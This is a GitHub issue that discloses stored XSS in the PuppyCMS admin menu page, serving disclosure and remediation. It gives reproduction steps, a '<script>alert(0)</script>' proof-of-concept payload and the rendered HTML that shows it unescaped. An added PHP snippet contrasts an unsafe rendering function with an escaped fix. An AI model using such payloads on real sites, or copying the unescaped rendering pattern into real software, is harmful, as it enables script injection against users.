
There is an XSS vulnerability that can execute JavaScript #12

Open

Westbrookadmin opened this issue Aug 7, 2018 · 1 comment

@Westbrookadmin

There are 3 XSS vulnerabilities.
Load admin/menu.php,
sign in and select "SETTINGS",
insert the payload "'<script>alert(0)</script>" in the Add Page/URL, URL, or Link Text field and submit.

Open menu.php at line 167:

```html
<script type="text/javascript">
$(document).ready(function(){
$('[href="menu.php"]').addClass('active');
});
</script>
<div class="main">
<div class="main-content">
<div class="container-fluid">

<div class="panel panel-headline">
<div class="panel-heading">
<h3 class="panel-title">Create Menu</h3>
<p class="subtitle">Add/Remove/Edit files and folders.</p>
</div>
<div class="panel-body">
<form class="row" method="post" action="" id="menu-form">
<textarea name="created-menu-array" id="created-menu-array" class="created-menu-array"></textarea>
<div class="col-sm-4">
<h3 class="text-center">Add Page/URL</h3>
<hr/>
<div class="panel panel-primary">
<div class="panel-heading">Pages</div>
<div class="panel-body">
<div class="menu-available-pages" id="menu-available-pages">
</div>

<div class="text-right">
<button class="btn btn-default" id="menu-select-all">Select All</button>
<button class="btn btn-primary" id="menu-add-pages">Add Page(s)</button>
</div>
</div>
</div>

<div class="panel panel-primary">
<div class="panel-heading">Custom Link</div>
<div class="panel-body">
<div class="form-group">
<label>URL</label>
<input type="text" class="form-control" id="mal-url" name="">
</div>

<div class="form-group">
<label>Link Text</label>
<input type="text" class="form-control" id="mal-text" name="">
</div>

<div class="text-right">
<button class="btn btn-primary pull-right" id="menu-add-link">Add Link</button>
</div>
</div>
</div>
</div>

<div class="col-sm-8">
<h3 class="text-center">Menu Structure</h3>
<hr/>
<div class="dd menu-selected-items" id="menu-selected-items">
<ol class="dd-list menu-selected-items-list"><li class="dd-item" data-menu_file="" data-menu_url="/" data-menu_title="Home"><div class="dd-handle">Home<span class="fa fa-close menu_item_remove"></span></div></li><li class="dd-item" data-menu_file="" data-menu_url="<script>alert(0)</script>" data-menu_title="<script>alert(0)</script>"><div class="dd-handle"><script>alert(0)</script><span class="fa fa-close menu_item_remove"></span></div></li></ol>
</div>
</div>

<div class="form-group text-right">
<div class="col-sm-12">
<input type="submit" id="menu-submit" name="menu-submit" class="btn btn-success" value="Submit"/>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="clearfix"></div>
<footer>
<div class="container-fluid">
<p class="copyright">&copy; 2018 PuppyCMS. All Rights Reserved.</p>
</div>
</footer>
</div>
<script src="assets/scripts/puppyadmin.js"></script>
```
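As an added illustration (not PuppyCMS code), the unescaped rendering pattern visible in the `<ol>` above is shown beside a hardened version that escapes every stored value for its HTML context; the `$item` array shape and the function names are assumptions:

```php
<?php
// Added example, not PuppyCMS code. The stored-XSS output above interpolates
// the saved menu title and URL into data-* attributes and the element's text
// without escaping, so a saved "<script>" string is emitted as live markup.

/** Escape a value for use inside an HTML attribute value or text node. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Vulnerable rendering, reproducing the pattern seen in the report. */
function renderMenuItemUnsafe(array $item): string
{
    return '<li class="dd-item" data-menu_file="' . $item['file']
        . '" data-menu_url="' . $item['url']
        . '" data-menu_title="' . $item['title'] . '">'
        . '<div class="dd-handle">' . $item['title']
        . '<span class="fa fa-close menu_item_remove"></span></div></li>';
}

/** Hardened rendering: each interpolated value is escaped for its context. */
function renderMenuItem(array $item): string
{
    return '<li class="dd-item" data-menu_file="' . h($item['file'])
        . '" data-menu_url="' . h($item['url'])
        . '" data-menu_title="' . h($item['title']) . '">'
        . '<div class="dd-handle">' . h($item['title'])
        . '<span class="fa fa-close menu_item_remove"></span></div></li>';
}

// Constructed sample: the payload from the report saved as a custom link.
$item = [
    'file'  => '',
    'url'   => "'<script>alert(0)</script>",
    'title' => "'<script>alert(0)</script>",
];

echo renderMenuItemUnsafe($item), PHP_EOL; // script tag reaches the browser verbatim
echo renderMenuItem($item), PHP_EOL;       // emitted as &#039;&lt;script&gt;... inert text
```

Escaping on output is the fix for this rendering path; if the same values are also inserted by puppyadmin.js on the client, that code must set them via text/attribute APIs rather than building HTML strings.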

@Westbrookadmin (Author)

Can you help me apply for a CVE number? Thank you very much indeed.
